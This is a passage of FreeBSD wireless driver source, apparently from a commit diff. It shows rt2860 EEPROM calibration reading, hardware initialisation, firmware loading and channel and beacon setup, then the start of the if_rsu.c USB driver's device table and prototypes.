RT2860_EEPROM_TSSI4_2GHZ); sc->tssi_2ghz[6] = val & 0xff; /* [+2] */ sc->tssi_2ghz[7] = val >> 8; /* [+3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI5_2GHZ); sc->tssi_2ghz[8] = val & 0xff; /* [+4] */ sc->step_2ghz = val >> 8; DPRINTF(("TSSI 2GHz: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x " "0x%02x 0x%02x step=%d\n", sc->tssi_2ghz[0], sc->tssi_2ghz[1], sc->tssi_2ghz[2], sc->tssi_2ghz[3], sc->tssi_2ghz[4], sc->tssi_2ghz[5], sc->tssi_2ghz[6], sc->tssi_2ghz[7], sc->tssi_2ghz[8], sc->step_2ghz)); /* check that ref value is correct, otherwise disable calibration */ if (sc->tssi_2ghz[4] == 0xff) sc->calib_2ghz = 0; val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI1_5GHZ); sc->tssi_5ghz[0] = val & 0xff; /* [-4] */ sc->tssi_5ghz[1] = val >> 8; /* [-3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI2_5GHZ); sc->tssi_5ghz[2] = val & 0xff; /* [-2] */ sc->tssi_5ghz[3] = val >> 8; /* [-1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI3_5GHZ); sc->tssi_5ghz[4] = val & 0xff; /* [+0] */ sc->tssi_5ghz[5] = val >> 8; /* [+1] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI4_5GHZ); sc->tssi_5ghz[6] = val & 0xff; /* [+2] */ sc->tssi_5ghz[7] = val >> 8; /* [+3] */ val = rt2860_srom_read(sc, RT2860_EEPROM_TSSI5_5GHZ); sc->tssi_5ghz[8] = val & 0xff; /* [+4] */ sc->step_5ghz = val >> 8; DPRINTF(("TSSI 5GHz: 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x 0x%02x " "0x%02x 0x%02x step=%d\n", sc->tssi_5ghz[0], sc->tssi_5ghz[1], sc->tssi_5ghz[2], sc->tssi_5ghz[3], sc->tssi_5ghz[4], sc->tssi_5ghz[5], sc->tssi_5ghz[6], sc->tssi_5ghz[7], sc->tssi_5ghz[8], sc->step_5ghz)); /* check that ref value is correct, otherwise disable calibration */ if (sc->tssi_5ghz[4] == 0xff) sc->calib_5ghz = 0; /* read RSSI offsets and LNA gains from EEPROM */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI1_2GHZ); sc->rssi_2ghz[0] = val & 0xff; /* Ant A */ sc->rssi_2ghz[1] = val >> 8; /* Ant B */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI2_2GHZ); if (sc->mac_ver >= 0x3071) { /* * On RT3090 chips (limited to 2 Rx chains), this ROM * field contains the Tx mixer 
gain for the 2GHz band. */ if ((val & 0xff) != 0xff) sc->txmixgain_2ghz = val & 0x7; DPRINTF(("tx mixer gain=%u (2GHz)\n", sc->txmixgain_2ghz)); } else sc->rssi_2ghz[2] = val & 0xff; /* Ant C */ sc->lna[2] = val >> 8; /* channel group 2 */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI1_5GHZ); sc->rssi_5ghz[0] = val & 0xff; /* Ant A */ sc->rssi_5ghz[1] = val >> 8; /* Ant B */ val = rt2860_srom_read(sc, RT2860_EEPROM_RSSI2_5GHZ); sc->rssi_5ghz[2] = val & 0xff; /* Ant C */ sc->lna[3] = val >> 8; /* channel group 3 */ val = rt2860_srom_read(sc, RT2860_EEPROM_LNA); if (sc->mac_ver >= 0x3071) sc->lna[0] = RT3090_DEF_LNA; else /* channel group 0 */ sc->lna[0] = val & 0xff; sc->lna[1] = val >> 8; /* channel group 1 */ /* fix broken 5GHz LNA entries */ if (sc->lna[2] == 0 || sc->lna[2] == 0xff) { DPRINTF(("invalid LNA for channel group %d\n", 2)); sc->lna[2] = sc->lna[1]; } if (sc->lna[3] == 0 || sc->lna[3] == 0xff) { DPRINTF(("invalid LNA for channel group %d\n", 3)); sc->lna[3] = sc->lna[1]; } /* fix broken RSSI offset entries */ for (ant = 0; ant < 3; ant++) { if (sc->rssi_2ghz[ant] < -10 || sc->rssi_2ghz[ant] > 10) { DPRINTF(("invalid RSSI%d offset: %d (2GHz)\n", ant + 1, sc->rssi_2ghz[ant])); sc->rssi_2ghz[ant] = 0; } if (sc->rssi_5ghz[ant] < -10 || sc->rssi_5ghz[ant] > 10) { DPRINTF(("invalid RSSI%d offset: %d (5GHz)\n", ant + 1, sc->rssi_5ghz[ant])); sc->rssi_5ghz[ant] = 0; } } return 0; } int rt2860_bbp_init(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) int i, ntries; /* wait for BBP to wake up */ for (ntries = 0; ntries < 20; ntries++) { uint8_t bbp0 = rt2860_mcu_bbp_read(sc, 0); if (bbp0 != 0 && bbp0 != 0xff) break; } if (ntries == 20) { device_printf(sc->sc_dev, "timeout waiting for BBP to wake up\n"); return ETIMEDOUT; } /* initialize BBP registers to default values */ for (i = 0; i < N(rt2860_def_bbp); i++) { rt2860_mcu_bbp_write(sc, rt2860_def_bbp[i].reg, rt2860_def_bbp[i].val); } /* fix BBP84 for RT2860E */ if (sc->mac_ver == 0x2860 && sc->mac_rev != 0x0101) rt2860_mcu_bbp_write(sc, 84, 0x19); if (sc->mac_ver >= 0x3071) { rt2860_mcu_bbp_write(sc, 79, 0x13); rt2860_mcu_bbp_write(sc, 80, 0x05); rt2860_mcu_bbp_write(sc, 81, 0x33); } else if (sc->mac_ver == 0x2860 && sc->mac_rev == 0x0100) { rt2860_mcu_bbp_write(sc, 69, 0x16); rt2860_mcu_bbp_write(sc, 73, 0x12); } return 0; #undef N } static int rt2860_txrx_enable(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; int ntries; /* enable Tx/Rx DMA engine */ RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_TX_EN); RAL_BARRIER_READ_WRITE(sc); for (ntries = 0; ntries < 200; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 200) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); return ETIMEDOUT; } DELAY(50); tmp |= RT2860_RX_DMA_EN | RT2860_TX_DMA_EN | RT2860_WPDMA_BT_SIZE64 << RT2860_WPDMA_BT_SIZE_SHIFT; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* set Rx filter */ tmp = RT2860_DROP_CRC_ERR | RT2860_DROP_PHY_ERR; if (ic->ic_opmode != IEEE80211_M_MONITOR) { tmp |= RT2860_DROP_UC_NOME | RT2860_DROP_DUPL | RT2860_DROP_CTS | RT2860_DROP_BA | RT2860_DROP_ACK | RT2860_DROP_VER_ERR | RT2860_DROP_CTRL_RSV | RT2860_DROP_CFACK | RT2860_DROP_CFEND; if (ic->ic_opmode == IEEE80211_M_STA) tmp |= RT2860_DROP_RTS | RT2860_DROP_PSPOLL; } RAL_WRITE(sc, RT2860_RX_FILTR_CFG, tmp); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); return 0; } 
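/*
 * Illustration (hypothetical helper, not part of the driver): the per-rate
 * Tx power words written to the RT2860_TX_PWR_CFG registers pack eight
 * 4-bit fields into one 32-bit value, so a global correction, such as the
 * temperature compensation in rt2860_calib() below, must be applied one
 * nibble at a time with b4inc().  A minimal sketch, assuming a fixed +2
 * adjustment:
 */
#if 0
static void
rt2860_bump_txpower(struct rt2860_softc *sc)
{
	int ridx;

	for (ridx = 0; ridx < 5; ridx++) {
		/* 0xffffffff marks an entry that was not programmed in EEPROM */
		if (sc->txpow20mhz[ridx] == 0xffffffff)
			continue;
		/* each 4-bit field is raised by 2 and clamped to 0xf */
		RAL_WRITE(sc, RT2860_TX_PWR_CFG(ridx),
		    b4inc(sc->txpow20mhz[ridx], 2));
	}
}
#endif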
static void rt2860_init(void *arg) { struct rt2860_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; RAL_LOCK(sc); rt2860_init_locked(sc); RAL_UNLOCK(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) ieee80211_start_all(ic); } static void rt2860_init_locked(struct rt2860_softc *sc) { #define N(a) (sizeof (a) / sizeof ((a)[0])) struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; uint32_t tmp; uint8_t bbp1, bbp3; int i, qid, ridx, ntries, error; RAL_LOCK_ASSERT(sc); if (sc->rfswitch) { /* hardware has a radio switch on GPIO pin 2 */ if (!(RAL_READ(sc, RT2860_GPIO_CTRL) & (1 << 2))) { device_printf(sc->sc_dev, "radio is disabled by hardware switch\n"); #ifdef notyet rt2860_stop_locked(sc); return; #endif } } RAL_WRITE(sc, RT2860_PWR_PIN_CFG, RT2860_IO_RA_PE); /* disable DMA */ tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* PBF hardware reset */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe1f); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe00); if ((error = rt2860_load_microcode(sc)) != 0) { device_printf(sc->sc_dev, "could not load 8051 microcode\n"); rt2860_stop_locked(sc); return; } rt2860_set_macaddr(sc, IF_LLADDR(ifp)); /* init Tx power for all Tx rates (from EEPROM) */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; RAL_WRITE(sc, RT2860_TX_PWR_CFG(ridx), sc->txpow20mhz[ridx]); } for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); rt2860_stop_locked(sc); return; } tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* reset Rx ring and all 6 Tx rings */ RAL_WRITE(sc, RT2860_WPDMA_RST_IDX, 0x1003f); /* PBF hardware reset */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe1f); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, 0xe00); RAL_WRITE(sc, RT2860_PWR_PIN_CFG, RT2860_IO_RA_PE | RT2860_IO_RF_PE); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, 0); for (i = 0; i < N(rt2860_def_mac); i++) RAL_WRITE(sc, rt2860_def_mac[i].reg, rt2860_def_mac[i].val); if (sc->mac_ver >= 0x3071) { /* set delay of PA_PE assertion to 1us (unit of 0.25us) */ RAL_WRITE(sc, RT2860_TX_SW_CFG0, 4 << RT2860_DLY_PAPE_EN_SHIFT); } if (!(RAL_READ(sc, RT2860_PCI_CFG) & RT2860_PCI_CFG_PCI)) { sc->sc_flags |= RT2860_PCIE; /* PCIe has different clock cycle count than PCI */ tmp = RAL_READ(sc, RT2860_US_CYC_CNT); tmp = (tmp & ~0xff) | 0x7d; RAL_WRITE(sc, RT2860_US_CYC_CNT, tmp); } /* wait while MAC is busy */ for (ntries = 0; ntries < 100; ntries++) { if (!(RAL_READ(sc, RT2860_MAC_STATUS_REG) & (RT2860_RX_STATUS_BUSY | RT2860_TX_STATUS_BUSY))) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for MAC\n"); rt2860_stop_locked(sc); return; } /* clear Host to MCU mailbox */ RAL_WRITE(sc, RT2860_H2M_BBPAGENT, 0); RAL_WRITE(sc, RT2860_H2M_MAILBOX, 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0, 0); DELAY(1000); if ((error = rt2860_bbp_init(sc)) != 0) { rt2860_stop_locked(sc); return; } /* clear RX WCID search table */ RAL_SET_REGION_4(sc, RT2860_WCID_ENTRY(0), 0, 512); /* clear pairwise key table */ RAL_SET_REGION_4(sc, RT2860_PKEY(0), 0, 2048); /* clear IV/EIV table */ RAL_SET_REGION_4(sc, RT2860_IVEIV(0), 0, 512); /* clear WCID attribute table */ RAL_SET_REGION_4(sc, 
RT2860_WCID_ATTR(0), 0, 256); /* clear shared key table */ RAL_SET_REGION_4(sc, RT2860_SKEY(0, 0), 0, 8 * 32); /* clear shared key mode */ RAL_SET_REGION_4(sc, RT2860_SKEY_MODE_0_7, 0, 4); /* init Tx rings (4 EDCAs + HCCA + Mgt) */ for (qid = 0; qid < 6; qid++) { RAL_WRITE(sc, RT2860_TX_BASE_PTR(qid), sc->txq[qid].paddr); RAL_WRITE(sc, RT2860_TX_MAX_CNT(qid), RT2860_TX_RING_COUNT); RAL_WRITE(sc, RT2860_TX_CTX_IDX(qid), 0); } /* init Rx ring */ RAL_WRITE(sc, RT2860_RX_BASE_PTR, sc->rxq.paddr); RAL_WRITE(sc, RT2860_RX_MAX_CNT, RT2860_RX_RING_COUNT); RAL_WRITE(sc, RT2860_RX_CALC_IDX, RT2860_RX_RING_COUNT - 1); /* setup maximum buffer sizes */ RAL_WRITE(sc, RT2860_MAX_LEN_CFG, 1 << 12 | (MCLBYTES - sizeof (struct rt2860_rxwi) - 2)); for (ntries = 0; ntries < 100; ntries++) { tmp = RAL_READ(sc, RT2860_WPDMA_GLO_CFG); if ((tmp & (RT2860_TX_DMA_BUSY | RT2860_RX_DMA_BUSY)) == 0) break; DELAY(1000); } if (ntries == 100) { device_printf(sc->sc_dev, "timeout waiting for DMA engine\n"); rt2860_stop_locked(sc); return; } tmp &= 0xff0; RAL_WRITE(sc, RT2860_WPDMA_GLO_CFG, tmp); /* disable interrupts mitigation */ RAL_WRITE(sc, RT2860_DELAY_INT_CFG, 0); /* write vendor-specific BBP values (from EEPROM) */ for (i = 0; i < 8; i++) { if (sc->bbp[i].reg == 0 || sc->bbp[i].reg == 0xff) continue; rt2860_mcu_bbp_write(sc, sc->bbp[i].reg, sc->bbp[i].val); } /* select Main antenna for 1T1R devices */ if (sc->rf_rev == RT3070_RF_2020 || sc->rf_rev == RT3070_RF_3020 || sc->rf_rev == RT3070_RF_3320) rt3090_set_rx_antenna(sc, 0); /* send LEDs operating mode to microcontroller */ rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED1, sc->led[0], 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED2, sc->led[1], 0); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_LED3, sc->led[2], 0); if (sc->mac_ver >= 0x3071) rt3090_rf_init(sc); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_SLEEP, 0x02ff, 1); rt2860_mcu_cmd(sc, RT2860_MCU_CMD_WAKEUP, 0, 1); if (sc->mac_ver >= 0x3071) rt3090_rf_wakeup(sc); /* disable non-existing Rx chains */ bbp3 = rt2860_mcu_bbp_read(sc, 3); bbp3 &= ~(1 << 3 | 1 << 4); if (sc->nrxchains == 2) bbp3 |= 1 << 3; else if (sc->nrxchains == 3) bbp3 |= 1 << 4; rt2860_mcu_bbp_write(sc, 3, bbp3); /* disable non-existing Tx chains */ bbp1 = rt2860_mcu_bbp_read(sc, 1); if (sc->ntxchains == 1) bbp1 = (bbp1 & ~(1 << 3 | 1 << 4)); else if (sc->mac_ver == 0x3593 && sc->ntxchains == 2) bbp1 = (bbp1 & ~(1 << 4)) | 1 << 3; else if (sc->mac_ver == 0x3593 && sc->ntxchains == 3) bbp1 = (bbp1 & ~(1 << 3)) | 1 << 4; rt2860_mcu_bbp_write(sc, 1, bbp1); if (sc->mac_ver >= 0x3071) rt3090_rf_setup(sc); /* select default channel */ rt2860_switch_chan(sc, ic->ic_curchan); /* reset RF from MCU */ rt2860_mcu_cmd(sc, RT2860_MCU_CMD_RFRESET, 0, 0); /* set RTS threshold */ tmp = RAL_READ(sc, RT2860_TX_RTS_CFG); tmp &= ~0xffff00; tmp |= IEEE80211_RTS_DEFAULT << 8; RAL_WRITE(sc, RT2860_TX_RTS_CFG, tmp); /* setup initial protection mode */ rt2860_updateprot(ifp); /* turn radio LED on */ rt2860_set_leds(sc, RT2860_LED_RADIO); /* enable Tx/Rx DMA engine */ if ((error = rt2860_txrx_enable(sc)) != 0) { rt2860_stop_locked(sc); return; } /* clear pending interrupts */ RAL_WRITE(sc, RT2860_INT_STATUS, 0xffffffff); /* enable interrupts */ RAL_WRITE(sc, RT2860_INT_MASK, 0x3fffc); if (sc->sc_flags & RT2860_ADVANCED_PS) rt2860_mcu_cmd(sc, RT2860_MCU_CMD_PSLEVEL, sc->pslevel, 0); ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; ifp->if_drv_flags |= IFF_DRV_RUNNING; callout_reset(&sc->watchdog_ch, hz, rt2860_watchdog, sc); #undef N } static void rt2860_stop(void *arg) { struct rt2860_softc *sc = arg; 
RAL_LOCK(sc); rt2860_stop_locked(sc); RAL_UNLOCK(sc); } static void rt2860_stop_locked(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; uint32_t tmp; int qid; if (ifp->if_drv_flags & IFF_DRV_RUNNING) rt2860_set_leds(sc, 0); /* turn all LEDs off */ callout_stop(&sc->watchdog_ch); sc->sc_tx_timer = 0; ifp->if_drv_flags &= ~(IFF_DRV_RUNNING | IFF_DRV_OACTIVE); /* disable interrupts */ RAL_WRITE(sc, RT2860_INT_MASK, 0); /* disable GP timer */ rt2860_set_gp_timer(sc, 0); /* disable Rx */ tmp = RAL_READ(sc, RT2860_MAC_SYS_CTRL); tmp &= ~(RT2860_MAC_RX_EN | RT2860_MAC_TX_EN); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, tmp); /* reset adapter */ RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, RT2860_BBP_HRST | RT2860_MAC_SRST); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_MAC_SYS_CTRL, 0); /* reset Tx and Rx rings (and reclaim TXWIs) */ sc->qfullmsk = 0; for (qid = 0; qid < 6; qid++) rt2860_reset_tx_ring(sc, &sc->txq[qid]); rt2860_reset_rx_ring(sc, &sc->rxq); } int rt2860_load_microcode(struct rt2860_softc *sc) { const struct firmware *fp; int ntries, error; RAL_LOCK_ASSERT(sc); RAL_UNLOCK(sc); fp = firmware_get("rt2860fw"); RAL_LOCK(sc); if (fp == NULL) { device_printf(sc->sc_dev, "unable to receive rt2860fw firmware image\n"); return EINVAL; } /* set "host program ram write selection" bit */ RAL_WRITE(sc, RT2860_SYS_CTRL, RT2860_HST_PM_SEL); /* write microcode image */ RAL_WRITE_REGION_1(sc, RT2860_FW_BASE, fp->data, fp->datasize); /* kick microcontroller unit */ RAL_WRITE(sc, RT2860_SYS_CTRL, 0); RAL_BARRIER_WRITE(sc); RAL_WRITE(sc, RT2860_SYS_CTRL, RT2860_MCU_RESET); RAL_WRITE(sc, RT2860_H2M_BBPAGENT, 0); RAL_WRITE(sc, RT2860_H2M_MAILBOX, 0); /* wait until microcontroller is ready */ RAL_BARRIER_READ_WRITE(sc); for (ntries = 0; ntries < 1000; ntries++) { if (RAL_READ(sc, RT2860_SYS_CTRL) & RT2860_MCU_READY) break; DELAY(1000); } if (ntries == 1000) { device_printf(sc->sc_dev, "timeout waiting for MCU to initialize\n"); error = ETIMEDOUT; } else error = 0; firmware_put(fp, FIRMWARE_UNLOAD); return error; } /* * This function is called periodically to adjust Tx power based on * temperature variation. 
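 * BBP register 49 is read as the temperature indicator and compared
 * against the per-band TSSI reference values from the EEPROM; the
 * resulting offset, scaled by the per-band step, is applied to the
 * per-rate TX_PWR_CFG registers.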
*/ #ifdef NOT_YET static void rt2860_calib(struct rt2860_softc *sc) { struct ieee80211com *ic = &sc->sc_ic; const uint8_t *tssi; uint8_t step, bbp49; int8_t ridx, d; /* read current temperature */ bbp49 = rt2860_mcu_bbp_read(sc, 49); if (IEEE80211_IS_CHAN_2GHZ(ic->ic_bss->ni_chan)) { tssi = &sc->tssi_2ghz[4]; step = sc->step_2ghz; } else { tssi = &sc->tssi_5ghz[4]; step = sc->step_5ghz; } if (bbp49 < tssi[0]) { /* lower than reference */ /* use higher Tx power than default */ for (d = 0; d > -4 && bbp49 <= tssi[d - 1]; d--); } else if (bbp49 > tssi[0]) { /* greater than reference */ /* use lower Tx power than default */ for (d = 0; d < +4 && bbp49 >= tssi[d + 1]; d++); } else { /* use default Tx power */ d = 0; } d *= step; DPRINTF(("BBP49=0x%02x, adjusting Tx power by %d\n", bbp49, d)); /* write adjusted Tx power values for each Tx rate */ for (ridx = 0; ridx < 5; ridx++) { if (sc->txpow20mhz[ridx] == 0xffffffff) continue; RAL_WRITE(sc, RT2860_TX_PWR_CFG(ridx), b4inc(sc->txpow20mhz[ridx], d)); } } #endif static void rt3090_set_rx_antenna(struct rt2860_softc *sc, int aux) { uint32_t tmp; if (aux) { tmp = RAL_READ(sc, RT2860_PCI_EECTRL); RAL_WRITE(sc, RT2860_PCI_EECTRL, tmp & ~RT2860_C); tmp = RAL_READ(sc, RT2860_GPIO_CTRL); RAL_WRITE(sc, RT2860_GPIO_CTRL, (tmp & ~0x0808) | 0x08); } else { tmp = RAL_READ(sc, RT2860_PCI_EECTRL); RAL_WRITE(sc, RT2860_PCI_EECTRL, tmp | RT2860_C); tmp = RAL_READ(sc, RT2860_GPIO_CTRL); RAL_WRITE(sc, RT2860_GPIO_CTRL, tmp & ~0x0808); } } static void rt2860_switch_chan(struct rt2860_softc *sc, struct ieee80211_channel *c) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; u_int chan, group; chan = ieee80211_chan2ieee(ic, c); if (chan == 0 || chan == IEEE80211_CHAN_ANY) return; if (sc->mac_ver >= 0x3071) rt3090_set_chan(sc, chan); else rt2860_set_chan(sc, chan); /* determine channel group */ if (chan <= 14) group = 0; else if (chan <= 64) group = 1; else if (chan <= 128) group = 2; else group = 3; /* XXX necessary only when group has changed! */ rt2860_select_chan_group(sc, group); DELAY(1000); } static int rt2860_setup_beacon(struct rt2860_softc *sc, struct ieee80211vap *vap) { struct ieee80211com *ic = vap->iv_ic; struct ieee80211_beacon_offsets bo; struct rt2860_txwi txwi; struct mbuf *m; int ridx; if ((m = ieee80211_beacon_alloc(vap->iv_bss, &bo)) == NULL) return ENOBUFS; memset(&txwi, 0, sizeof txwi); txwi.wcid = 0xff; txwi.len = htole16(m->m_pkthdr.len); /* send beacons at the lowest available rate */ ridx = IEEE80211_IS_CHAN_5GHZ(ic->ic_bsschan) ? RT2860_RIDX_OFDM6 : RT2860_RIDX_CCK1; txwi.phy = htole16(rt2860_rates[ridx].mcs); if (rt2860_rates[ridx].phy == IEEE80211_T_OFDM) txwi.phy |= htole16(RT2860_PHY_OFDM); txwi.txop = RT2860_TX_TXOP_HT; txwi.flags = RT2860_TX_TS; txwi.xflags = RT2860_TX_NSEQ; RAL_WRITE_REGION_1(sc, RT2860_BCN_BASE(0), (uint8_t *)&txwi, sizeof txwi); RAL_WRITE_REGION_1(sc, RT2860_BCN_BASE(0) + sizeof txwi, mtod(m, uint8_t *), m->m_pkthdr.len); m_freem(m); return 0; } static void rt2860_enable_tsf_sync(struct rt2860_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211vap *vap = TAILQ_FIRST(&ic->ic_vaps); uint32_t tmp; tmp = RAL_READ(sc, RT2860_BCN_TIME_CFG); tmp &= ~0x1fffff; tmp |= vap->iv_bss->ni_intval * 16; tmp |= RT2860_TSF_TIMER_EN | RT2860_TBTT_TIMER_EN; if (vap->iv_opmode == IEEE80211_M_STA) { /* * Local TSF is always updated with remote TSF on beacon * reception. 
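		 * (TSF sync mode 1 in the BCN_TIME_CFG register.)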
*/ tmp |= 1 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (vap->iv_opmode == IEEE80211_M_IBSS || vap->iv_opmode == IEEE80211_M_MBSS) { tmp |= RT2860_BCN_TX_EN; /* * Local TSF is updated with remote TSF on beacon reception * only if the remote TSF is greater than local TSF. */ tmp |= 2 << RT2860_TSF_SYNC_MODE_SHIFT; } else if (vap->iv_opmode == IEEE80211_M_HOSTAP) { tmp |= RT2860_BCN_TX_EN; /* SYNC with nobody */ tmp |= 3 << RT2860_TSF_SYNC_MODE_SHIFT; } RAL_WRITE(sc, RT2860_BCN_TIME_CFG, tmp); } diff --git a/sys/dev/usb/wlan/if_rsu.c b/sys/dev/usb/wlan/if_rsu.c index 8bd23d102b2e..4e6ef7db1037 100644 --- a/sys/dev/usb/wlan/if_rsu.c +++ b/sys/dev/usb/wlan/if_rsu.c @@ -1,2488 +1,2488 @@ /* $OpenBSD: if_rsu.c,v 1.17 2013/04/15 09:23:01 mglocker Exp $ */ /*- * Copyright (c) 2010 Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * Driver for Realtek RTL8188SU/RTL8191SU/RTL8192SU. * * TODO: * o 11n support * o h/w crypto * o hostap / ibss / mesh */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR rsu_debug #include #include #ifdef USB_DEBUG static int rsu_debug = 0; SYSCTL_NODE(_hw_usb, OID_AUTO, rsu, CTLFLAG_RW, 0, "USB rsu"); SYSCTL_INT(_hw_usb_rsu, OID_AUTO, debug, CTLFLAG_RW, &rsu_debug, 0, "Debug level"); #endif static const STRUCT_USB_HOST_ID rsu_devs[] = { #define RSU_HT_NOT_SUPPORTED 0 #define RSU_HT_SUPPORTED 1 #define RSU_DEV_HT(v,p) { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, \ RSU_HT_SUPPORTED) } #define RSU_DEV(v,p) { USB_VPI(USB_VENDOR_##v, USB_PRODUCT_##v##_##p, \ RSU_HT_NOT_SUPPORTED) } RSU_DEV(ASUS, RTL8192SU), RSU_DEV(AZUREWAVE, RTL8192SU_4), RSU_DEV_HT(ACCTON, RTL8192SU), RSU_DEV_HT(ASUS, USBN10), RSU_DEV_HT(AZUREWAVE, RTL8192SU_1), RSU_DEV_HT(AZUREWAVE, RTL8192SU_2), RSU_DEV_HT(AZUREWAVE, RTL8192SU_3), RSU_DEV_HT(AZUREWAVE, RTL8192SU_5), RSU_DEV_HT(BELKIN, RTL8192SU_1), RSU_DEV_HT(BELKIN, RTL8192SU_2), RSU_DEV_HT(BELKIN, RTL8192SU_3), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_1), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_2), RSU_DEV_HT(CONCEPTRONIC2, RTL8192SU_3), RSU_DEV_HT(COREGA, RTL8192SU), RSU_DEV_HT(DLINK2, DWA131A1), RSU_DEV_HT(DLINK2, RTL8192SU_1), RSU_DEV_HT(DLINK2, RTL8192SU_2), RSU_DEV_HT(EDIMAX, RTL8192SU_1), RSU_DEV_HT(EDIMAX, RTL8192SU_2), RSU_DEV_HT(EDIMAX, EW7622UMN), RSU_DEV_HT(GUILLEMOT, HWGUN54), RSU_DEV_HT(GUILLEMOT, HWNUM300), RSU_DEV_HT(HAWKING, RTL8192SU_1), RSU_DEV_HT(HAWKING, RTL8192SU_2), RSU_DEV_HT(PLANEX2, GWUSNANO), RSU_DEV_HT(REALTEK, RTL8171), RSU_DEV_HT(REALTEK, RTL8172), RSU_DEV_HT(REALTEK, RTL8173), RSU_DEV_HT(REALTEK, RTL8174), RSU_DEV_HT(REALTEK, RTL8192SU), 
RSU_DEV_HT(REALTEK, RTL8712), RSU_DEV_HT(REALTEK, RTL8713), RSU_DEV_HT(SENAO, RTL8192SU_1), RSU_DEV_HT(SENAO, RTL8192SU_2), RSU_DEV_HT(SITECOMEU, WL349V1), RSU_DEV_HT(SITECOMEU, WL353), RSU_DEV_HT(SWEEX2, LW154), #undef RSU_DEV_HT #undef RSU_DEV }; static device_probe_t rsu_match; static device_attach_t rsu_attach; static device_detach_t rsu_detach; static usb_callback_t rsu_bulk_tx_callback; static usb_callback_t rsu_bulk_rx_callback; static usb_error_t rsu_do_request(struct rsu_softc *, struct usb_device_request *, void *); static struct ieee80211vap * rsu_vap_create(struct ieee80211com *, const char name[], int, enum ieee80211_opmode, int, const uint8_t bssid[], const uint8_t mac[]); static void rsu_vap_delete(struct ieee80211vap *); static void rsu_scan_start(struct ieee80211com *); static void rsu_scan_end(struct ieee80211com *); static void rsu_set_channel(struct ieee80211com *); static void rsu_update_mcast(struct ifnet *); static int 